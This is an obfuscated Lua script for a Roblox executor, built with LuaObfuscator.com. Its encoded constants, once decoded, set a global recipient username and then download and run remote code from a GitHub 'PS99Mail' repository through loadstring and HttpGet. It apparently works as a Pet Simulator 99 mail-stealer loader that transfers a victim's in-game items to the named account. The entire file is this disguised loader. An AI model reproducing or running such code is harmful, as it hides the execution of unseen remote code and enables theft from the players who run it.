--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v93=v5(v82,v19);v19=nil;return v93;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((1639 -(1523 + 114))^(((v33-(1 -0)) -(v32-(2 -(1 + 0)))) + (620 -((790 -235) + 64)))) ;return v83-(v83%(932 -((1922 -(68 + 997)) + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=(1 + 1)^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -((1552 -(226 + 1044)) + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (373 -(32 + (157 -72)))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + (118 -53))) ;v35=2 -1 ;end end end local function v23()local v38=(255 + 95) -((1084 -(915 + 82)) + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * ((535 -346) + 67)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(468 + 334 + 150)) );v18=v18 + (10 -(7 -1)) ;v38=1 -0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1188 -(1069 + 118) ;local v46=(v20(v44,1,45 -25 ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + 423) )==((775 -(201 + 571)) -2)) and  -(19 -(10 + (1146 -(116 + 1022))))) or (3 -2) ;if (v47==0) then if (v46==(442 -(416 + (108 -82)))) then return v48 * 0 ;else local v94=0;while true do if (v94==(0 -0)) then v47=1 + 0 + 0 ;v45=0;break;end end end elseif (v47==2047) then return ((v46==((0 -0) -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-((8909 -6400) -((1857 -(814 + 45)) + 488)) ) * (v45 + (v46/((1 + 1)^((105 -62) + 1 + 8)))) ;end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(886 -(261 + 624))) then v51=v3(v16,v18,(v18 + v49) -((767 -(745 + 21)) -0) );v18=v18 + v49 ;v50=1082 -(1020 + 60) ;end if (v50==(1425 -(630 + 793))) then v52={};for v95=3 -2 , #v51 do v52[v95]=v2(v1(v3(v51,v95,v95)));end v50=14 -11 ;end if (v50==(0 + (0 -0))) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -(0 + 0))) then return "";end end v50=1748 -(760 + 987) ;end if (v50==(1916 -(1789 + 124))) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1769 -(1749 + 20) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(1 + 1)) then else local v89=1322 -(1249 + 73) ;while true do if ((1 + 0)==v89) then v53=1148 -(466 + 679) ;break;end if (v89==(0 -0)) then v58=nil;v59=nil;v89=2 -1 ;end end end if (v53==(1904 -(106 + 1794))) then while true do if (v54==(1 + 2)) then v61=nil;while true do local v104=0 + 0 ;while true do if (v104==(1092 -(975 + 117))) then local v105=0;local v106;while true do if (v105==0) then v106=0 -0 ;while true do if (1~=v106) then else v104=2 -1 ;break;end if (v106~=(0 + 0)) then else local v165=0 -0 ;while true do if (v165==0) then if (v55~=1) then else local v167=0;local v168;while true do if (v167==(0 -0)) then v168=0;while true do if (v168==(115 -(4 + 110))) then local v176=0 -0 ;while true do if (1~=v176) then else v168=2;break;end if (v176==0) then for v180=1 -0 ,v60 do local v181=0 -0 ;local v182;local v183;local v184;local v185;while true do if (v181~=2) then else while true do if (v182==(584 -(57 + 527))) then local v194=1427 -(41 + 1386) ;while true do if (v194==(2 -1)) then v182=1228 -(322 + 905) ;break;end if (v194==(103 -(17 + 86))) then v183=0 + 0 ;v184=nil;v194=1;end end end if (v182==1) then v185=nil;while true do if (v183~=(0 -0)) then else local v201=0 -0 ;local v202;while true do if (v201==0) then v202=166 -(122 + 44) ;while true do if (v202==(0 -0)) then local v213=0 -0 ;while true do if (v213==(0 -0)) then v184=v21();v185=nil;v213=1 + 0 ;end if (v213~=1) then else v202=1 + 0 ;break;end end end if (v202==(441 -(382 + 58))) then v183=1;break;end end break;end end end if (v183~=1) then else if (v184==(3 -2)) then v185=v21()~=0 ;elseif (v184==2) then v185=v24();elseif (v184==(5 -2)) then v185=v25();end v61[v180]=v185;break;end end break;end end break;end if (v181~=1) then else v184=nil;v185=nil;v181=2 + 0 ;end if (v181~=(65 -(30 + 35))) then else v182=0;v183=nil;v181=2 -1 ;end end end v59[1208 -(902 + 303) ]=v21();v176=1 -0 ;end end end if (v168~=(0 -0)) then else local v177=0;local v178;while true do if (v177~=(0 + 0)) then else v178=1257 -(1043 + 214) ;while true do if (v178==0) then local v186=0 -0 ;while true do if (v186==(1691 -(1121 + 569))) then v178=1;break;end if ((1212 -(323 + 889))~=v186) then else v60=v23();v61={};v186=2 -1 ;end end end if (v178~=(215 -(22 + 192))) then else v168=581 -(361 + 219) ;break;end end break;end end end if (v168~=(322 -(53 + 267))) then else v55=2;break;end end break;end end end if (v55==(1 + 1)) then local v169=0;while true do if (v169==(414 -(15 + 398))) then return v59;end if (v169==(0 -0)) then for v170=983 -(18 + 964) ,v23() do local v171=0 -0 ;local v172;local v173;while true do if (v171==0) then v172=0 -0 ;v173=nil;v171=1 + 0 ;end if (v171==(1 + 0)) then while true do if (v172==(765 -(468 + 297))) then v173=v21();if (v20(v173,851 -(20 + 830) ,1)~=(0 + 0)) then else local v187=126 -(116 + 10) ;local v188;local v189;local v190;while true do if (v187==(565 -(334 + 228))) then if (v20(v189,1 + 2 ,6 -3 )==(739 -(542 + 196))) then v190[4]=v61[v190[8 -4 ]];end v56[v170]=v190;break;end if (v187==2) then local v192=0;while true do if (v192==(0 -0)) then if (v20(v189,1 + 0 ,237 -(141 + 95) )~=1) then else v190[2]=v61[v190[2]];end if (v20(v189,2,2 + 0 )~=(1 + 0)) then else v190[7 -4 ]=v61[v190[2 + 1 ]];end v192=1 + 0 ;end if ((1 + 0)==v192) then v187=8 -5 ;break;end end end if (v187==(0 -0)) then local v193=0 + 0 ;while true do if (v193~=(2 -1)) then else v187=1 -0 ;break;end if (v193==(0 + 0)) then v188=v20(v173,2,1554 -(1126 + 425) );v189=v20(v173,409 -(118 + 287) ,23 -17 );v193=1122 -(118 + 1003) ;end end end if (v187==(2 -1)) then v190={v22(),v22(),nil,nil};if (v188==(0 -0)) then local v197=0 -0 ;local v198;local v199;local v200;while true do if (v197==0) then v198=0 + 0 ;v199=nil;v197=1 + 0 ;end if (v197==(978 -(553 + 424))) then v200=nil;while true do if (0~=v198) then else local v210=0 -0 ;while true do if (v210~=1) then else v198=1;break;end if ((849 -(254 + 595))~=v210) then else v199=0;v200=nil;v210=1;end end end if (v198==(127 -(55 + 71))) then while true do if (v199~=0) then else v200=0;while true do if ((0 + 0)==v200) then v190[3]=v22();v190[4 + 0 ]=v22();break;end end break;end end break;end end break;end end elseif (v188==1) then v190[3]=v23();elseif (v188==(2 + 0)) then v190[2 + 1 ]=v23() -((2 + 0)^(25 -9)) ;elseif (v188==(6 -3)) then local v211=0 -0 ;local v212;while true do if ((0 -0)==v211) then v212=0 -0 ;while true do if (v212==0) then v190[3]=v23() -((1 + 1)^(77 -61)) ;v190[4]=v22();break;end end break;end end end v187=755 -(239 + 514) ;end end end break;end end break;end end end for v174=1 + 0 ,v23() do v57[v174-(1330 -(797 + 532)) ]=v28();end v169=1 + 0 ;end end end v165=1 + 0 ;end if (v165==(2 -1)) then v106=1 + 0 ;break;end end end end break;end end end if ((1887 -(927 + 959))~=v104) then else if (v55~=(1202 -(373 + 829))) then else local v131=731 -(476 + 255) ;while true do if (1==v131) then local v161=0;while true do if (v161~=(1131 -(369 + 761))) then else v131=2;break;end if (0==v161) then v58={};v59={v56,v57,nil,v58};v161=98 -(11 + 86) ;end end end if (v131~=(0 -0)) then else local v162=0;while true do if (v162==(238 -(64 + 174))) then local v166=0 -0 ;while true do if (v166~=(0 + 0)) then else v56={};v57={};v166=1 -0 ;end if (v166==(337 -(144 + 192))) then v162=1797 -(503 + 1293) ;break;end end end if (v162==(217 -(42 + 174))) then v131=1 + 0 ;break;end end end if ((2 + 0)==v131) then v55=1062 -(810 + 251) ;break;end end end break;end end end break;end if (v54==1) then v57=nil;v58=nil;v54=2;end if ((0 + 0)~=v54) then else local v101=0;while true do if (v101==0) then v55=1504 -(363 + 1141) ;v56=nil;v101=1581 -(1183 + 397) ;end if (v101==(2 -1)) then v54=1 + 0 ;break;end end end if (v54~=(2 + 0)) then else local v102=533 -(43 + 490) ;local v103;while true do if (v102==0) then v103=0 + 0 ;while true do if (v103~=(0 -0)) then else local v132=1975 -(1913 + 62) ;while true do if (0~=v132) then else v59=nil;v60=nil;v132=1 + 0 ;end if (v132==(1 + 0)) then v103=2 -1 ;break;end end end if (v103~=(1934 -(565 + 1368))) then else v54=11 -8 ;break;end end break;end end end end break;end if (v53==(1662 -(1477 + 184))) then local v90=0;while true do if (v90==(1 -0)) then v53=1746 -(1344 + 400) ;break;end if (v90==(405 -(255 + 150))) then v56=nil;v57=nil;v90=1 + 0 ;end end end if ((0 + 0)~=v53) then else local v91=856 -(564 + 292) ;while true do if (v91==(1 -0)) then v53=1;break;end if (v91==(1739 -(404 + 1335))) then v54=0 -0 ;v55=nil;v91=305 -(244 + 60) ;end end end if (v53==(3 + 0)) then local v92=0 + 0 ;while true do if ((477 -(41 + 435))~=v92) then else v53=4;break;end if (v92~=(1001 -(938 + 63))) then else v60=nil;v61=nil;v92=1 + 0 ;end end end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==0) then v108=v80[2];v109,v110=v71(v78[v108](v13(v78,v108 + 1 ,v80[3])));v107=1;end if (v107==1) then v73=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v153=v108,v73 do v111=v111 + 1 ;v78[v153]=v109[v111];end break;end end else do return;end end elseif (v81<=2) then v64[v80[3]]=v78[v80[2]];elseif (v81==3) then v64[v80[3]]=v78[v80[2]];else v78[v80[2]]=v80[3];end elseif (v81<=7) then if (v81<=5) then v72=v80[3];elseif (v81>6) then v78[v80[2]]();else local v137=v80[2];local v138=v78[v80[3]];v78[v137 + 1 ]=v138;v78[v137]=v138[v80[4]];end elseif (v81<=8) then for v124=v80[2],v80[3] do v78[v124]=nil;end elseif (v81==9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v126=v115,v73 do v118=v118 + 1 ;v78[v126]=v116[v118];end else local v119=v80[2];local v120=v78[v80[3]];v78[v119 + 1 ]=v120;v78[v119]=v120[v80[4]];end elseif (v81<=13) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81>14) then v78[v80[2]]=v80[3];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=18) then if (v81<=16) then for v129=v80[2],v80[3] do v78[v129]=nil;end elseif (v81==17) then local v147=v80[2];v78[v147]=v78[v147](v13(v78,v147 + 1 ,v73));else v72=v80[3];end elseif (v81<=19) then v78[v80[2]]();elseif (v81>20) then local v150=0;local v151;while true do if (v150==0) then v151=v80[2];v78[v151]=v78[v151](v13(v78,v151 + 1 ,v73));break;end end else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503073O0059726F746E6D65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120F3O00014O0008000100013O0026093O0002000100010004123O0002000100120F000100013O00260900010005000100010004123O0005000100120F000200033O001202000200023O00120A000200043O00120A000300053O00200C00030003000600120F000500074O000B000300054O001500023O00022O00070002000100010004123O001400010004123O000500010004123O001400010004123O000200016O00017O00",v9(),...);
